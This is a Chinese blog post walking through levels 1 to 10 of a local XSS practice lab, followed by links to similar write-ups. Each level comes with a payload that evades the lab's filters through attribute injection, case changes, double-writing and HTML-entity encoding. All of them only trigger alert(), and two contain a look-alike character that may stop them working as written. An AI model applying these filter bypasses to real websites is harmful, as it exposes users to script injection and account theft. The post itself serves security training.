xss闯关记录 1-10超详细

最新推荐文章于 2024-04-30 05:17:19 发布
最新推荐文章于 2024-04-30 05:17:19 发布
阅读量568 收藏 1
点赞数
分类专栏: 靶场 文章标签: xss javascript 信息安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44717303/article/details/115352293
版权

xss挑战过关教程

挑战关卡

准备环境

首先需要一个 xss通关挑战源码 需要准备一个PHPstuday 最后需要一台可以正常联网的电脑

第一关

没有任何保护随便一条脚本语句均可

<a href=javascript:/00/,alert(%22M%22)>M</a>

在这里插入图片描述
在这里插入图片描述

第二关

"> <a href=javascript:/00/,alert(%22M%22)>M</a>//

对比上一关多了个闭合在这里插入图片描述

第三关

在这里插入图片描述
代码是对的就是执行不出来那我们找一个不需要>的

'οnclick='javascript:alert(1)'

在这里插入图片描述

第四关

改成双引号就可以了

"onclick='javascript:alert(1)'

第五关

复制第一关的代码即可
黑名单过滤 避免出现 onclick和脚本关键字即可

"> <a href=javascript:/00/,alert(%22M%22)>M</a>//

第六关

我们用第5关的代码发现href被过滤掉了
在这里插入图片描述

"> <a hRef=javascript:/00/,alert(%22M%22)>M</a>//

大写后发现正常
在这里插入图片描述

第七关

好家伙直接给我屏蔽了关键字
在这里插入图片描述
双写试试

"> <a hhrefref=javascript:/00/,alert(%22m%22)>m</a>//

成功!!!!
在这里插入图片描述

"> <a hhrefref=javasscriptcript:/00/,alert(%22m%22)>m</a>//

第八关

写入此代码发现无法正确跳转

javascript:/00/,alert(%22m%22) //错的

在这里插入图片描述
他把脚本关键字过滤了

在这里插入图片描述
双写也没办法
需要用转意字符太恶心了吧

java&#115;&#99;&#114;&#105;&#112;&#116;:alert(1)

在这里插入图片描述

第九关

构造payload
加一个正确的注释即可

java&#115;&#99;&#114;&#105;&#112;&#116;:alert(1)/*http://xiaowan.xyz*/

在这里插入图片描述

第十关

在这里插入图片描述
构造注入点

&t_sort=" type="text" οnclick="alert()
Satoshi Nakamoto
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
1ncrd#Study-Record#BUUCTF[第二章 web进阶]XSS闯关1.md
08-10
一些关于xss的payload
xss闯关详解
m0_73189964的博客
06-25 1238
xss前18关详解
XSS-labs(1-10闯关详解
m0_46467017的博客
07-25 2747
通过查看可以知道本关与上一关的不同,在于转换后的内容不同,虽然添加了大小写转换,但是因为转换后,字符被转换为空字符,所以转换后的字符如何仍可以组合成,那么就可以绕过该防御机制。进入第八关后,发现无法构造闭合,采用是采用了htmlspecialchars($str)函数,而且闭合方式是双引号,所以input中无法注入,但是在连接里面是有地方可以注入的。右键查看源代码,发现我们输入的>,.........
XSS-Game 通关教程,XSS-Game level1-18,XSS靶场通关教程_xss靶场level
最新发布
2401_84186109的博客
04-30 613
3)第三步:弹窗测试,回车即可弹窗,自动进入下一关。4)从源码可以看到,第一关没有任何过滤。​​​​​​​​。
xss闯关(1-20)
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
06-10 578
XSS(Cross-Site Scripting)是一种常见的Web攻击技术,攻击者通过注入恶意代码,使得在用户访问受到攻击的网站时执行并影响用户的浏览器。XSS攻击通常被用于盗取用户信息、会话劫持、篡改网站内容等非法目的。
Xss小游戏通关攻略带解释
sirius的博客
08-28 5442
Xss小游戏通关攻略 实验环境:xss小游戏源码+phpstudy 源码地址:https://files.cnblogs.com/files/Eleven-Liu/xss%E7%BB%83%E4%B9%A0%E5%B0%8F%E6%B8%B8%E6%88%8F.zip 实验步骤:启动phpstudy,浏览器访问127.0.0.1/xss/后提示点击图片进入第一关。 第一关:输入的变量直接被输出,直接构造payload即可。 http://127.0.0.1/xss/level1.php?.
XSS挑战之旅1-10
weixin_52116519的博客
11-15 1315
XSS漏洞介绍。
xss-filter-spring-boot-starter:springboot自动xss
05-17
xss-filter-spring-boot-starter springboot自动xss 使用方法在项目的pom.xml中加入依赖即口 <groupId>com.djk</groupId> <artifactId>xss-filter-spring-boot-starter <version>0.0.1 目前支持3种入参数xss...
xss challenge 下载 xss 实践通关小游戏,以闯关的形式检验xss掌握程度。
04-27
xss challenge 下载 xss 实践通关小游戏,以闯关的形式检验xss掌握程度。
xss闯关小游戏.zip
02-25
这是一款利用xss漏洞闯关的小游戏,无需连接数据库,共20关,非常适合网络安全攻防的初学者练习使用,使用及安装教程请看此链接,https://editor.csdn.net/md?articleId=104496122 欢迎各位小伙伴下载
xss闯关挑战
11-09
这个是XSS闯关文件,解压后放在服务器的对应文件夹即可。 闯关笔记我博客中有记录,新手可以参考。 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如...
【网络安全 --- xss-labs靶场通关(1-10关)】详细xss-labs靶场通关思路及技巧讲解,让你对xss漏洞的理解更深刻
m0_67844671的博客
10-21 4083
【网络安全 --- xss-labs靶场通关(1-10关)】详细xss-labs靶场通关思路及技巧讲解,让你对xss漏洞的理解更深刻
XSS-Game 通关教程,XSS-Game level1-18,XSS靶场通关教程
热门推荐
wangyuxiang946的博客
01-07 1万+
XSS-Game level1 XSS-Game level2 XSS-Game level3 XSS-Game level4 XSS-Game level5 XSS-Game level6 XSS-Game level7 XSS-Game level8 XSS-Game level9 XSS-Game level10 XSS-Game level11 XSS-Game level12 XSS-Game level13 XSS-Game level16 XSS-Game level17
Xss-labs闯关总结
未完成的歌~的博客
07-13 7582
文章目录前言:Level 1 无过滤机制查看后台源码:通关代码:Level 2 闭合标签查看后台源码:通关代码:Level 3 单引号闭合 + 添加事件查看后台源码:通关代码:Level 4 双引号闭合 + 添加事件查看后台源码:通关代码:Level 5 新建标签查看后台源码:通关代码:Level 6 大小写绕过查看后台源码:通关代码:Level 7 双写绕过查看后台源码:通关代码:Level 8 编码绕过查看后台源码:通关代码:Level 9 检测关键字查看后台源码:通关代码:Level 10 隐藏信息查
xss-labs靶场全通关
m0_52051132的博客
10-15 1566
在这里关于 如何搭建靶场的就不再赘述了,可以在本地用phpstudy来搭建的。建议使用火狐浏 览器,访问http://ip/xss-labs点击图片开始你的xss之旅吧!
XSS-labs通关
em.....
10-24 4194
XSS-labs通关 1.第一关 payload: http://xss/level1.php?name=<Script>alert(1)</Script> 2.第二关 这里变量出现在两处,我们直接利用第二处,做构造以及闭合 payload: 1"><ScRipt>alert(1)</ScRipt> 3.第三关 ​ ​ 用第二关的payload去试一下,发现内容没变化,但是就是没当成js代码 ​ 查一下网页源代码和php代码 ​ 看
代码审计之xss-labs_1-13关代码分析
qq_36585338的博客
11-26 170
【代码】代码审计之xss-labs_1-13关代码分析。
XSS-Lab闯关笔记
末初的CSDN博客
08-16 589
xss-lab项目地址:https://github.com/rebo-rn/xss-lab xss学习文章:https://wizardforcel.gitbooks.io/xss-naxienian/content/0.html xss-lab在线环境::https://xss.angelo.org.cn/ XSS-Lablevel1level2level3level4level5level6level7level8level9level10level11level12level13level14lev
BuuCTF[第二章 web进阶]XSS闯关
m_de_g的博客
07-27 5325
** [第二章 web进阶]XSS闯关 ** 一、解题思路 1.一来看了一下题目的说明 我们需要执行alert函数 那就开启闯关模式,第一关,一看这个URL就很奇怪没直接上手,二话没说成功下一关 http://491c2e5e-9e61-408a-b82d-6615548d150b.node4.buuoj.cn/level1?username=<script>alert('xss')</script> 通过观察url,我惊奇的发现闯关的关卡,是由level1,level2…,我
[第二章 web进阶]xss闯关 1
04-10
XSS是指跨站脚本攻击。它是一种利用Web应用程序中的漏洞,向用户的浏览器中注入恶意代码的攻击方式。攻击者通过注入恶意代码,可以窃取用户的敏感信息,甚至控制用户的电脑。在Web应用程序中,应该采取安全措施,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值